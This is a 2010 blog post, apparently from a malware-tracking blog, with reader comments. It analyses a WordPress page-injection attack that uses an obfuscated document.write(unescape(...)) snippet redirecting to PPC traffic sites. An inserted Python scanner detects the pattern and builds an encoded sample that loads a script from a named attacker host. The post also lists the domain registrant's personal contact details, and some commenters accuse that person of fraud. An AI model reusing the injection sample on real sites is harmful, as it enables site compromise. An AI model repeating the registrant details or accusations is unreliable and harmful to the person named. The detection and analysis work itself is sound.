
Thursday, 4 February 2010

Sergey Ryabov / director@climbing-games.com strikes again

There's a somewhat unusual spate of injection attacks doing the rounds: code is being injected into the middle of victim pages through an unknown flaw, starting with document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D and then going on for a bit. Deobfuscating the code actually leads to a second layer of obfuscation, but once that is decoded it becomes clearer.
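As an added example (not code from the original post), here is a small Python scanner of the kind a site owner could run over a WordPress theme file: it looks for the document.write(unescape('%..')) pattern described above, peels the nested layers of percent-encoding the way the browser's unescape() would (the prefix quoted above decodes to <script language=), and lists the hosts the innermost decoded code references. The header.php content is constructed here for the demonstration; the hostname in it is the one the post names.

```python
import re

# Pattern of the injected snippet the post describes: document.write(unescape('%3C...'))
WRITE_UNESCAPE = re.compile(
    r"document\.write\s*\(\s*unescape\s*\(\s*(['\"])([^'\"]*)\1\s*\)\s*\)", re.I)
HOST_RE = re.compile(r"(?:https?:)?//([a-z0-9.-]+\.[a-z]{2,})", re.I)

def js_unescape(s):
    """Decode like JavaScript's unescape(): %uXXXX first, then %XX (no UTF-8 step)."""
    s = re.sub(r"%u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), s)
    return re.sub(r"%([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), s)

def js_escape(s):
    """Percent-encode every character; used only to build the constructed sample."""
    return "".join(f"%{ord(c):02X}" for c in s)

def peel_layers(snippet, max_layers=5):
    """Decode nested document.write(unescape(...)) layers; return each decoded layer."""
    layers, current = [], snippet
    for _ in range(max_layers):
        m = WRITE_UNESCAPE.search(current)
        if not m:
            break
        current = js_unescape(m.group(2))
        layers.append(current)
    return layers

def scan_file_text(text):
    """Report each injected snippet in a theme file with its innermost decoded layer."""
    findings = []
    for m in WRITE_UNESCAPE.finditer(text):
        layers = peel_layers(m.group(0))
        inner = layers[-1] if layers else ""
        findings.append({"line": text.count("\n", 0, m.start()) + 1,
                         "layers": len(layers), "decoded": inner,
                         "hosts": sorted({h.lower() for h in HOST_RE.findall(inner)})})
    return findings

# Constructed sample: a header.php carrying a two-layer injection that points at the
# host named in the post (the real injection was much longer).
INNER = '<script language="javascript" src="http://itsallbreaksoft.net/x.js"></script>'
MIDDLE = "document.write(unescape('" + js_escape(INNER) + "'))"
SAMPLE_HEADER_PHP = ("<?php wp_head(); ?>\n<script>document.write(unescape('"
                     + js_escape(MIDDLE) + "'))</script>\n</head>")

if __name__ == "__main__":
    for f in scan_file_text(SAMPLE_HEADER_PHP):
        print(f"line {f['line']}: {f['layers']} layer(s), hosts={f['hosts']}")
        print("  decoded:", f["decoded"])
```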

The injected code points to itsallbreaksoft.net


This then bounces through paymoneysystem.info/in.cgi?michaeleknowlton before hitting a seemingly random PPC search engine site hosted on 95.211.27.154, for example sdeh.net/iframe.html. Sophos have an excellent write-up of the anatomy of the injection attack here, and it's pretty clear that somebody is ripping somebody else off for PPC traffic. It's hard to say who the victims actually are.

The domains itsallbreaksoft.net and paymoneysystem.info belong to the same person; they are interesting because of the registration details:

Nexton Limited
Ryabov Sergey (director@climbing-games.com)
+79219270961
Fax: +79219270961
Scherbakova st., 6-38
Saint-Petersburg, 197375
RU

These contact details are very well known for very bad things. Incidentally, the registrar is ruler-domains.com, also an enterprise registered to "Sergey Ryabov" (if that's a real person).

It's all kind of strange, as there doesn't appear to be a malware payload, which is good. But because of the way click arbitrage works, finding the real victims and villains is tricky, although interested researchers may want to have a poke around.

7 comments:

wahnula said...

Hey Dynamoo,

I just ran a quick Google search of the code snippet you provided, and the top spot in Google is not a malware alert site, it is an anti-abortion site. The code is embedded in the source code for the page, but it renders like the original site.

This may be a dumb question, but is this a sign of hacking/injecting?

Although I don't quite agree with their views, I was going to warn them but see no contact link on that page. Thanks

Conrad Longmore said...

It's a Wordpress injection attack, so the obfuscated code snippet turns up on victim sites rather than the payload site.

Right at the moment this appears to account for most of the injection attacks that I am seeing.

PROseo P4tr4sch said...

Hi,
my wordpress blog is infected with that. Can you tell me how to fix it please? ty

PROseo P4tr4sch said...

found it in the header.php and deleted it.. thx

MysteryFCM said...

I've been on to Leaseweb and had sdeh.net suspended (along with rich-traffic.com, which was also related to this) :o)

Unknown said...

Idownloadstream.com is related to the same individual/company.

It is a complete scam.
When looking for a download, the site will rank first in the search.
Site offers a 3 day test for $1.95.
But it charges $80.69 for 6 months in your back (rip-off).
When you login on the site, you find out that the file you expected doesn't exist (bait & switch).
Then you try to get a refund, but it goes through web-support-center (anonymous).
The site's activity has grown tremendously since January 2010.

The owner is Russian, who is known for his lawlessness internationally:
Nexton Limited
Ryabov Sergey (director@climbing-games.com), probably a fake name too.
+79219270961
Fax: +79219270961
Scherbakova 6-38
Saint-Petersburg, 197375
Russia

Mr. Hyde said...

Ruler-domains.com is simply a reseller of the registrar Enom.com.

The director@climbing-games.com etc. is the default info they used to put in if their customers opted for whois-protect. More recently they started to use Enom's own whois-protection instead.

Sergey Ryabov is a real person, the owner of the ruler-domains.